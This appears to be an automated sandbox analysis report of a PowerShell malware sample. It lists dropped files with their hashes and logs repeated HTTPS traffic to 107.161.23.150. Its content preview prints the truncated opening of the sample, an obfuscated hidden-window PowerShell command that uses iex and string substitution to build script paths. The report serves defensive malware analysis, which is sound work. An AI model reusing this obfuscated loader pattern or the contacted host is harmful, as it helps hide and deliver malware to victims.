Preview:{"analyticsData":{"responseGUID":"f0441a81-060b-4f05-ac10-cb14b80ea542","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785715359,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:data
Category:dropped
Size (bytes):4
Entropy (8bit):0.8112781244591328
Encrypted:false
Malicious:false
Preview:....
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):2814
Entropy (8bit):5.131970944373652
Encrypted:false
Malicious:false
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
Category:dropped
Size (bytes):12288
Entropy (8bit):1.1445895242415662
Encrypted:false
Malicious:false
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:SQLite Rollback Journal
Category:dropped
Size (bytes):8720
Entropy (8bit):1.5502951543441779
Encrypted:false
Malicious:false
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:data
Category:dropped
Size (bytes):66726
Entropy (8bit):5.392739213842091
Encrypted:false
Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):1.1940658735648508
Encrypted:false
Malicious:false
Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):246
Entropy (8bit):3.5274671434738973
Encrypted:false
Malicious:false
Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.5.2.:.5.6. .=.=.=.....
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                        Category:dropped
                                                                                        Size (bytes):16525
                                                                                        Entropy (8bit):5.338264912747007
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                                                        MD5:128A51060103D95314048C2F32A15C66
                                                                                        SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                                                        SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                                                                        SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                                                        Malicious:false
                                                                                        Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):15114
                                                                                        Entropy (8bit):5.363767555505381
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:kD32/bKyCeR54nKQguj9b76CZOCElB1fpW+icAMIRE1rRo6hJLllKpKL+Ugkb6y2:Pu/
                                                                                        MD5:B1C62DB05D9E1891B40762982C93098A
                                                                                        SHA1:66CE0CFE6C1CC921466EA1EFD034D04AE325CC0B
                                                                                        SHA-256:F2CB8B50D802BE2C7F90D8D2A9CFC81F5C4F9177F23EBF39E2664EA140B7ACEE
                                                                                        SHA-512:93164528AFCCF15DFDDC4CEBD4F489CC56C1B5710395734516CD62E45C114EF96E3F81A7AFAC052D29CA5C9A3400BF790F9C2EBF3A8F38F6FCC207932F78BDC3
                                                                                        Malicious:false
                                                                                        Preview:SessionID=83ec14f3-6257-434c-b70f-6f08e5d53d23.1734609170645 Timestamp=2024-12-19T06:52:50:645-0500 ThreadID=5172 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=83ec14f3-6257-434c-b70f-6f08e5d53d23.1734609170645 Timestamp=2024-12-19T06:52:50:646-0500 ThreadID=5172 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=83ec14f3-6257-434c-b70f-6f08e5d53d23.1734609170645 Timestamp=2024-12-19T06:52:50:646-0500 ThreadID=5172 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=83ec14f3-6257-434c-b70f-6f08e5d53d23.1734609170645 Timestamp=2024-12-19T06:52:50:646-0500 ThreadID=5172 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=83ec14f3-6257-434c-b70f-6f08e5d53d23.1734609170645 Timestamp=2024-12-19T06:52:50:646-0500 ThreadID=5172 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):29752
                                                                                        Entropy (8bit):5.405218723481037
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbiSkkQTUhOLD2jSNajSkL63O4c4:V3fOCIdJDepgF
                                                                                        MD5:1897447A04797A1B671EBAF5286B96F3
                                                                                        SHA1:94ED35B14A01350273381D296E48682FFFEBD723
                                                                                        SHA-256:D43F77201A9C56DFE27E8C5B94503DFB71659191053E6F28477838083DC44450
                                                                                        SHA-512:A1E422B3C42BC5E1AFBF886D81119F8F868A3FC8410030FA6A3B2611BB6E4E2ECCC13BB792201166D28FBD9F26CC1EB87F13E1C87417584EB9F712626CED3F15
                                                                                        Malicious:false
                                                                                        Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                        Category:dropped
                                                                                        Size (bytes):386528
                                                                                        Entropy (8bit):7.9736851559892425
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                        Malicious:false
                                                                                        Preview:
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                        Category:dropped
                                                                                        Size (bytes):1419751
                                                                                        Entropy (8bit):7.976496077007677
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                                                        MD5:95F182500FC92778102336D2D5AADCC8
                                                                                        SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                                                        SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                                                        SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                                                        Malicious:false
                                                                                        Preview:
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                        Category:dropped
                                                                                        Size (bytes):758601
                                                                                        Entropy (8bit):7.98639316555857
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                        Malicious:false
                                                                                        Preview:
                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                        Category:dropped
                                                                                        Size (bytes):1407294
                                                                                        Entropy (8bit):7.97605879016224
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                        MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                        SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                        SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                        SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                        Malicious:false
                                                                                        Preview:
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):6224
                                                                                        Entropy (8bit):3.7371104200363083
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:NfkZ3CLT3kvhkvCCtAxJzYdaHH3xJzYdavHJ:NfkqfAxJzG6xJzGC
                                                                                        MD5:4E1573D912BCD1FB103D5792A8D9F3F8
                                                                                        SHA1:694890FB0897552CDB9CA8BE4F7CA7C228759522
                                                                                        SHA-256:43E1BACBA3FDEB80BFFCA0697B8B7AEC28C41456220275963FF85BB41A7D3086
                                                                                        SHA-512:07E86AB409414779A323E49A291E810909BCED83F1A7F24A63E53FD963958FE61E938D034B893C11483E9C9006D312A05BBE5FECCF07ACB38B5B1FFBF51A4E41
                                                                                        Malicious:false
                                                                                        Preview:
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PDF document, version 1.7 (zip deflate encoded)
                                                                                        Category:dropped
                                                                                        Size (bytes):871324
                                                                                        Entropy (8bit):7.827941732382635
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:H8QbZ2upCDtuOQKE7nmA3xWYT6LTA2D9dx5:HXpCST7ntB+jDTx5
                                                                                        MD5:CC648C9FBCD03EAC939663F24ED3AB02
                                                                                        SHA1:56F288BABF7DA8A89354140BC5A6C6D09CFEDCAD
                                                                                        SHA-256:F4A5A2657C465B26BB136761227F9D640CD156BABDE0CB78297429020EE1B3D3
                                                                                        SHA-512:5F27E7000A182D1477A7F9DD36AFA668380DE68EF78AC47575ED8414C7D92467B30FDD653DD3A2609CA4250EAAFBD6D56DA5DE375D189222C477346CE8B35AC7
                                                                                        Malicious:false
                                                                                        Preview:%PDF-1.7.%......129 0 obj.<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>.endobj. ..143 0 obj.<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B34532>]/Index[129 38]/Info 128 0 R/Length 89/Prev 652771/Root 130 0 R/Size 167/Type/XRef/W[1 3 1]>>stream..h.bbd`.``b``..".:@$S.X..D....'..n..l..d.....IFwf.x-...$..4f`..,.V..8.....7@.??.@....:.M..endstream.endobj.startxref..0..%%EOF.. ..165 0 obj.<</C 180/E 164/Filter/FlateDecode/I 202/Length 167/O 126/S 74/V 142>>stream..h.b```a``.d`e`H.g.b@.!.f.........uv..g..u..(;.p0..2.h..@....b..H..1/.X..FI.....,]..5.....1*...d....f.i......H.0p.Z..3..E..../.(C!..2p....L...pUF.._.CU...0..."...endstream.endobj.130 0 obj.<</AcroForm 144 0 R/Metadata 48 0 R/Names 145 0 R/Outlines 103 0 R/Pages 127 0 R/StructTreeRoot 117 0 R/Type/Catalog>>.endobj.131 0 obj.<</Contents 132 0 R/CropBox[0 0 595.44 841.68]/Group<</CS/DeviceRGB/S/Transparency/T
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                        File type:ASCII text, with very long lines (841), with no line terminators
                                                                                        Entropy (8bit):5.3303431651217075
                                                                                        TrID:
                                                                                          File name:raEyjKggAf.ps1
                                                                                          File size:841 bytes
                                                                                          MD5:99bc052a7f6d2e62a0735f79b86a543d
                                                                                          SHA1:eb62356e6d752cb670b6ff3568a376c5fd4adafa
                                                                                          SHA256:ae4ce5950a66f479129844f0bc9f43b4802df2bb28995aef29abbf0ba300b270
                                                                                          SHA512:49849cda681472d18791b351807fe389f5e569f1add60a8282a02e2dcca63864d4ae126ecb224190bd8325e6127ba8e41a92daa4f56e82c3eb7679f8e42e5792
                                                                                          SSDEEP:24:X3vVGjjWITWxm4xLqlTNC/QWAa6KzI4twiTzo2al:tQKIo8lTNZKzIEw6o7
                                                                                          TLSH:7C0112892A8A8AE75551F55160C6493B3239C22569F604E3B6B4410716BCA7C0DD1C2A
                                                                                          File Content Preview:powershell -win hidden $h514zc=iex($('[Environment]::GetEk7ps'''.Replace('k7p','nvironmentVariable(''public'') + ''\\ppwfy1.vb')));$flol=iex($('[Environment]::GetEk7ps'''.Replace('k7p','nvironmentVariable(''public'') + ''\\hwj.vb')));function getit([strin
                                                                                          Icon Hash:3270d6baae77db44
                                                                                          Dec 19, 2024 12:52:47.227734089 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.234519005 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.234563112 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.234608889 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.234622955 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.234654903 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.234673023 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.241599083 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.241641045 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.241677999 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.241684914 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.241750002 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.249147892 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.249193907 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.249222994 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.249228954 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.249285936 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.256946087 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.256988049 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.257020950 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.257025957 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.257076979 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.397499084 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.397552013 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.397595882 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.397627115 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.397656918 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.397675037 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.404830933 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.404858112 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.404921055 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.404937029 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.404973030 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.404999018 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.411488056 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.411515951 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.411557913 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.411572933 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.411597967 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.411629915 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.419095993 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.419112921 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.419179916 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.419194937 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.419246912 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.426116943 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.426135063 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.426198959 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.426213026 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.426280975 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.433819056 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.433903933 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.433917046 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.433943987 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.433979034 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.434000015 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.441231012 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.441247940 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.441301107 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.441307068 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.441340923 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.447894096 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.447916985 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.447971106 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.447978020 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.448045969 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.589829922 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.589915991 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.589956999 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.590030909 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.590066910 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.590112925 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.597117901 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.597160101 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.597194910 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.597208023 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.597234011 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.597249985 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.604645967 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.604664087 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.604770899 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.604785919 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.604840040 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.611294031 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.611310959 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.611376047 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.611391068 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.611454010 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.618298054 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.618313074 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.618391991 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.618405104 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.618613005 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.625825882 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.625843048 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.625909090 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.625922918 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.625969887 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.633637905 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.633681059 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.633717060 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.633728981 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.633755922 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.633771896 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.641017914 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.641060114 CET44349714107.161.23.150192.168.2.6
                                                                                          Dec 19, 2024 12:52:47.641096115 CET49714443192.168.2.6107.161.23.150
                                                                                          Dec 19, 2024 12:52:47.641108036 CET44349714107.161.23.150192.168.2.6
